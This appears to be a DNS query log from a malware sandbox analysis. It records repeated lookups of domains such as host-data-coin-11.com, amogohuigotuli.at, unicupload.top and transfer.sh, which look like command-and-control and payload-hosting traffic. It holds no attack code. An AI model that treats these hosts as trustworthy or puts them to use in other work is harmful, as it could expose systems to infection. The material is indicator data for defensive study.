                                                                              Jan 11, 2022 20:43:56.088010073 CET8.8.8.8192.168.2.40xae61No error (0)data-host-coin-8.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:58.352391005 CET8.8.8.8192.168.2.40x773fNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:58.881081104 CET8.8.8.8192.168.2.40xcba3No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:59.099597931 CET8.8.8.8192.168.2.40xe5a9No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:59.449680090 CET8.8.8.8192.168.2.40x5467No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:59.679265022 CET8.8.8.8192.168.2.40xb7ceNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:59.913012028 CET8.8.8.8192.168.2.40xfc43No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:43:59.992465019 CET8.8.8.8192.168.2.40xb2dNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:00.857527018 CET8.8.8.8192.168.2.40xea83No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:01.094856024 CET8.8.8.8192.168.2.40x8d1No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:01.336083889 CET8.8.8.8192.168.2.40xfd8eNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:01.885543108 CET8.8.8.8192.168.2.40xdcdcNo error (0)data-host-coin-8.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:04.577234030 CET8.8.8.8192.168.2.40xa653No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:04.809919119 CET8.8.8.8192.168.2.40x6aa5No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:05.042123079 CET8.8.8.8192.168.2.40xb4c3No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:05.321938038 CET8.8.8.8192.168.2.40x4763No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:07.750276089 CET8.8.8.8192.168.2.40xf243No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:08.276881933 CET8.8.8.8192.168.2.40x61faNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:08.539293051 CET8.8.8.8192.168.2.40x948eNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:08.783509970 CET8.8.8.8192.168.2.40x985fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:08.783509970 CET8.8.8.8192.168.2.40x985fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:08.783509970 CET8.8.8.8192.168.2.40x985fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:08.783509970 CET8.8.8.8192.168.2.40x985fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:08.783509970 CET8.8.8.8192.168.2.40x985fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:12.618890047 CET8.8.8.8192.168.2.40xa882No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:13.877335072 CET8.8.8.8192.168.2.40x9841No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:14.111532927 CET8.8.8.8192.168.2.40x448aNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:26.607369900 CET8.8.8.8192.168.2.40x8b01No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:26.607369900 CET8.8.8.8192.168.2.40x8b01No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:26.607369900 CET8.8.8.8192.168.2.40x8b01No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:26.607369900 CET8.8.8.8192.168.2.40x8b01No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:26.607369900 CET8.8.8.8192.168.2.40x8b01No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:26.607369900 CET8.8.8.8192.168.2.40x8b01No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:29.413784027 CET8.8.8.8192.168.2.40x96fcNo error (0)patmushta.info8.209.79.15A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:35.718924046 CET8.8.8.8192.168.2.40xaff2No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:35.965981007 CET8.8.8.8192.168.2.40xb2a8No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.251482010 CET8.8.8.8192.168.2.40xc05fNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.377810955 CET8.8.8.8192.168.2.40x5388Server failure (2)srtuiyhuali.atnonenoneA (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.509876966 CET8.8.8.8192.168.2.40xc60No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.757941961 CET8.8.8.8192.168.2.40xbc11No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.939147949 CET8.8.8.8192.168.2.40x6054No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.939147949 CET8.8.8.8192.168.2.40x6054No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.939147949 CET8.8.8.8192.168.2.40x6054No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.939147949 CET8.8.8.8192.168.2.40x6054No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.939147949 CET8.8.8.8192.168.2.40x6054No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.939147949 CET8.8.8.8192.168.2.40x6054No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.939147949 CET8.8.8.8192.168.2.40x6054No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.939147949 CET8.8.8.8192.168.2.40x6054No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.939147949 CET8.8.8.8192.168.2.40x6054No error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.939147949 CET8.8.8.8192.168.2.40x6054No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:36.988843918 CET8.8.8.8192.168.2.40xd877No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:37.209645987 CET8.8.8.8192.168.2.40xb938No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:37.715781927 CET8.8.8.8192.168.2.40xa0f5No error (0)data-host-coin-8.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:38.797524929 CET8.8.8.8192.168.2.40xa33fNo error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:38.797524929 CET8.8.8.8192.168.2.40xa33fNo error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:38.797524929 CET8.8.8.8192.168.2.40xa33fNo error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:38.797524929 CET8.8.8.8192.168.2.40xa33fNo error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:38.797524929 CET8.8.8.8192.168.2.40xa33fNo error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:38.797524929 CET8.8.8.8192.168.2.40xa33fNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:38.797524929 CET8.8.8.8192.168.2.40xa33fNo error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:38.797524929 CET8.8.8.8192.168.2.40xa33fNo error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:38.797524929 CET8.8.8.8192.168.2.40xa33fNo error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:38.797524929 CET8.8.8.8192.168.2.40xa33fNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:40.719554901 CET8.8.8.8192.168.2.40x727No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:40.927947998 CET8.8.8.8192.168.2.40x4752No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:41.162457943 CET8.8.8.8192.168.2.40x26dbNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:41.369647026 CET8.8.8.8192.168.2.40x28f2No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:41.590332985 CET8.8.8.8192.168.2.40x17c6No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:41.810193062 CET8.8.8.8192.168.2.40x6252No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:42.030425072 CET8.8.8.8192.168.2.40xce66No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:42.246131897 CET8.8.8.8192.168.2.40xbbc7No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:42.484822989 CET8.8.8.8192.168.2.40x4694No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:42.714019060 CET8.8.8.8192.168.2.40xe569No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:42.714019060 CET8.8.8.8192.168.2.40xe569No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:43.231197119 CET8.8.8.8192.168.2.40xdce1No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:43.467884064 CET8.8.8.8192.168.2.40x11ebNo error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:43.467884064 CET8.8.8.8192.168.2.40x11ebNo error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:44.694936991 CET8.8.8.8192.168.2.40xf098No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:44.918253899 CET8.8.8.8192.168.2.40x469cNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:45.091128111 CET8.8.8.8192.168.2.40x968eNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:45.337661028 CET8.8.8.8192.168.2.40x4cd8No error (0)softwaresworld.net94.102.49.170A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:47.302603006 CET8.8.8.8192.168.2.40x96b0No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:47.302603006 CET8.8.8.8192.168.2.40x96b0No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:47.302603006 CET8.8.8.8192.168.2.40x96b0No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:47.302603006 CET8.8.8.8192.168.2.40x96b0No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:47.302603006 CET8.8.8.8192.168.2.40x96b0No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:47.302603006 CET8.8.8.8192.168.2.40x96b0No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:47.302603006 CET8.8.8.8192.168.2.40x96b0No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:47.302603006 CET8.8.8.8192.168.2.40x96b0No error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:47.302603006 CET8.8.8.8192.168.2.40x96b0No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:47.302603006 CET8.8.8.8192.168.2.40x96b0No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.158341885 CET8.8.8.8192.168.2.40x4c6bNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.385624886 CET8.8.8.8192.168.2.40x644eNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.455044031 CET8.8.8.8192.168.2.40x897fNo error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.626151085 CET8.8.8.8192.168.2.40x5846No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:51.855132103 CET8.8.8.8192.168.2.40xe8cbNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.115396023 CET8.8.8.8192.168.2.40xb87cNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.333758116 CET8.8.8.8192.168.2.40xc88No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.541667938 CET8.8.8.8192.168.2.40x41c4No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.778362989 CET8.8.8.8192.168.2.40xe014No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.907128096 CET8.8.8.8192.168.2.40x8a31No error (0)unic11m.top54.38.220.85A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:52.972795963 CET8.8.8.8192.168.2.40x7974No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.793574095 CET8.8.8.8192.168.2.40xe54aNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.798122883 CET8.8.8.8192.168.2.40x1c9eNo error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:55.887794971 CET8.8.8.8192.168.2.40x66ccNo error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.027518988 CET8.8.8.8192.168.2.40xdfe7No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.270229101 CET8.8.8.8192.168.2.40x4246No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.315061092 CET8.8.8.8192.168.2.40x6942No error (0)noc.social149.28.78.238A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.412401915 CET8.8.8.8192.168.2.40x5058No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:44:56.900274038 CET8.8.8.8192.168.2.40x6926No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.101553917 CET8.8.8.8192.168.2.40x7995No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.325273991 CET8.8.8.8192.168.2.40xee0bNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.544269085 CET8.8.8.8192.168.2.40x89f2No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.544269085 CET8.8.8.8192.168.2.40x89f2No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:00.744601965 CET8.8.8.8192.168.2.40x8187No error (0)github.com140.82.121.3A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.197093964 CET8.8.8.8192.168.2.40xdc20No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.197093964 CET8.8.8.8192.168.2.40xdc20No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.197093964 CET8.8.8.8192.168.2.40xdc20No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.197093964 CET8.8.8.8192.168.2.40xdc20No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:01.886451960 CET8.8.8.8192.168.2.40x91c8No error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:02.115704060 CET8.8.8.8192.168.2.40xc1c2No error (0)a0620531.xsph.ru141.8.192.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:04.023781061 CET8.8.8.8192.168.2.40x47e1No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at118.33.109.122A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at180.69.193.102A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at5.163.255.148A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at110.14.121.125A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at175.119.10.231A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at116.58.10.58A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at211.119.84.111A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.199732065 CET8.8.8.8192.168.2.40xc752No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.234123945 CET8.8.8.8192.168.2.40x10dfNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:05.560168982 CET8.8.8.8192.168.2.40x630fNo error (0)host-data-coin-11.com5.188.88.184A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:07.762454033 CET8.8.8.8192.168.2.40x3fNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at189.165.15.160A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at190.43.145.172A (IP address)IN (0x0001)
                                                                              Jan 11, 2022 20:45:10.379168034 CET8.8.8.8192.168.2.40x5821No error (0)amogohuigotuli.at61.98.7.133A (IP address)IN (0x0001)
